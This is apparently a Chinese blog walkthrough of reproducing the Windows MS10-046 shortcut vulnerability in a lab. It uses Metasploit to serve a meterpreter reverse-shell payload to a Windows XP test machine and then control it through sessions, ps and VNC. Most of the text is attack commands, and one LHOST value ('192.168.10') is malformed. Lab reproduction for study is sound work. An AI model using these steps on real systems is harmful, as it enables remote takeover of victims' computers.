开始复现
命令:
msfconsole //启动MSF Metasploit
search ms10-046 //搜索漏洞
use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模块
set payload windows/meterpreter/reverse_tcp //设置一个PAYLOAD为反弹连接shell
show options //查看相关设置
set SRVHOST 192.168.1.10 //设置攻击者自身IP
set LHOST 192.168.10 //设置反弹连接回来的IP (攻击者自身IP)
exploit/run //开始执行漏洞...![图片[1]-Windows漏洞MS10-046测试-铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232152449.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
会生成一个URL连接 复制这个地址 去另一台XP系统机器上测试 用浏览器打开会跳到共享文件夹下
![图片[2]-Windows漏洞MS10-046测试-铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232154406.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
然后来到MSF终端看见漏洞执行成功了 有一个连接会话 ID 1
命令 :
sessions -l 查看存在的会话
sessions -i 1 选着会话1![图片[3]-Windows漏洞MS10-046测试-铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232156353.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
输入ps命令查看进程 或者 输入run vnc 查看远程桌面 等等
![图片[4]-Windows漏洞MS10-046测试-铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232158280.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
![图片[5]-Windows漏洞MS10-046测试-铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232200882.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
© 版权声明
THE END
![表情[keai]-铭心博客](https://www.imxbk.com/wp-content/themes/zibll/img/smilies/keai.gif)
暂无评论内容